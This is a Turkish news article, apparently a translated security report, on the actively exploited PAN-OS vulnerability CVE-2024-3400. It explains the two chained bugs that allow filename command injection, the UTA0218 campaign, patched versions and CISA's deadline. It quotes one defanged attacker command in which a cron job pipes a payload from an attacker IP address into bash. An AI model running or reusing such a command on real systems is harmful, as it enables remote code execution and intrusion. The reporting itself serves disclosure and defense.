Palo Alto Networks, kötü niyetli aktörler tarafından aktif olarak istismar edilen PAN-OS’u etkileyen kritik bir güvenlik kusurunun daha fazla ayrıntısını paylaştı.
Şirket, şu şekilde takip edilen güvenlik açığını açıkladı: CVE-2024-3400 (CVSS puanı: 10.0), “karmaşık” ve yazılımın PAN-OS 10.2, PAN-OS 11.0 ve PAN-OS 11.1 sürümlerindeki iki hatanın birleşimi olarak.
Palo Alto Networks ürün güvenliği kıdemli müdürü Chandan BN, “İlkinde, GlobalProtect hizmeti, oturum kimliği biçimini saklamadan önce yeterince doğrulamadı. Bu, saldırganın, saldırganın seçtiği dosya adıyla boş bir dosya depolamasına olanak sağladı.” söz konusu.
“İkinci hata (dosyaların sistem tarafından oluşturulduğuna güvenerek) dosya adlarını bir komutun parçası olarak kullandı.”
Sorunların hiçbiri tek başına yeterince kritik olmasa da, bir araya getirildiklerinde kimlik doğrulaması yapılmadan uzak kabuk komutlarının yürütülmesine yol açabileceklerini belirtmekte fayda var.
Palo Alto Networks, kusurun sıfır gün istismarının arkasındaki tehdit aktörü UTA0218’in, duyarlı cihazlarda komut yürütmeyi gerçekleştirmek için iki aşamalı bir saldırı gerçekleştirdiğini söyledi. Etkinlik MidnightEclipse Operasyonu adı altında takip ediliyor.
Daha önce hem Volexity hem de ağ güvenliği şirketinin kendi Birim 42 tehdit istihbaratı bölümü tarafından açıklandığı gibi, bu, yürütülecek komutu içeren özel hazırlanmış isteklerin gönderilmesini ve daha sonra UPSTYLE adı verilen bir arka kapı aracılığıyla çalıştırılmasını içeriyor.
Volexity geçen hafta şunları kaydetti: “UTA0218’in ilk kalıcılık mekanizması kurulumu, çıktısının stdout’a yazıldığı ve yürütülmek üzere bash’a aktarıldığı, saldırgan tarafından kontrol edilen bir URL’den bir yük almak için wget’i kullanacak bir cron işinin yapılandırılmasını içeriyordu.”
“Saldırgan bu yöntemi belirli komutları dağıtmak ve yürütmek ve GOST (GO Basit Tünel) gibi ters proxy araçlarını indirmek için kullandı.”
Birim 42, bu mekanizma aracılığıyla yürütülen komutları belirleyemediğini söyledi – wget -qO- hxxp://172.233.228[.]93/politika | bash – ancak cron işi tabanlı implantın muhtemelen kullanım sonrası faaliyetleri yürütmek için kullanıldığı değerlendirildi.
Chandan, “1. aşamada saldırgan geçerli bir oturum kimliği yerine dikkatlice hazırlanmış bir kabuk komutunu GlobalProtect’e gönderir” diye açıkladı. “Bu, saldırganın seçtiği dosya adı gömülü bir komutla sistemde boş bir dosya oluşturulmasına neden oluyor.”
“2. aşamada, düzenli olarak çalışan, şüphelenmeyen zamanlanmış bir sistem işi, bir komutta saldırgan tarafından sağlanan dosya adını kullanır. Bu, saldırganın sağladığı komutun yükseltilmiş ayrıcalıklarla yürütülmesiyle sonuçlanır.”
Palo Alto Networks başlangıçta CVE-2024-3400’ün başarılı bir şekilde kullanılmasının GlobalProtect ağ geçidi veya GlobalProtect portalı (veya her ikisi) için güvenlik duvarı yapılandırmalarının ve cihaz telemetrisinin etkinleştirilmesini gerektirdiğini belirtmiş olsa da, şirket daha sonra cihaz telemetrisinin sorunla hiçbir ilgisi olmadığını doğruladı.
Bu, bir cihaza sızmak için telemetrinin etkinleştirilmesini gerektirmeyecek şekilde kusuru silah haline getirmek için bypass’lar keşfeden Bishop Fox’un yeni bulgularına dayanıyor.
Şirket ayrıca son birkaç gün içinde kusura yönelik yamaları yaygın olarak kullanılan diğer bakım sürümlerini de kapsayacak şekilde genişletti.
- PAN-OS 10.2.9-h1
- PAN-OS 10.2.8-h3
- PAN-OS 10.2.7-h8
- PAN-OS 10.2.6-h3
- PAN-OS 10.2.5-h6
- PAN-OS 10.2.4-h16
- PAN-OS 10.2.3-h13
- PAN-OS 10.2.2-h5
- PAN-OS 10.2.1-h2
- PAN-OS 10.2.0-h3
- PAN-OS 11.0.4-h1
- PAN-OS 11.0.4-h2
- PAN-OS 11.0.3-h10
- PAN-OS 11.0.2-h4
- PAN-OS 11.0.1-h4
- PAN-OS 11.0.0-h3
- PAN-OS 11.1.2-h3
- PAN-OS 11.1.1-h1
- PAN-OS 11.1.0-h3
CVE-2024-3400’ün aktif olarak kötüye kullanılması ve kavram kanıtlama (PoC) yararlanma kodunun mevcut olması ışığında, kullanıcıların olası tehditlere karşı korunmak amacıyla düzeltmeleri mümkün olan en kısa sürede uygulamak için gerekli adımları atmaları önerilir.
ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA) da bu açığı Bilinen İstismara Uğrayan Güvenlik Açıkları (KEV) kataloğuna ekleyerek federal kurumlara cihazlarını 19 Nisan 2024’e kadar koruma altına almalarını emretti.
Buna göre bilgi Shadowserver Foundation tarafından paylaşılan bilgiye göre, yaklaşık 22.542 internete açık güvenlik duvarı cihazı muhtemelen CVE-2024-3400’e karşı savunmasızdır. 18 Nisan 2024 itibarıyla cihazların çoğunluğu ABD, Japonya, Hindistan, Almanya, İngiltere, Kanada, Avustralya, Fransa ve Çin’de bulunmaktadır.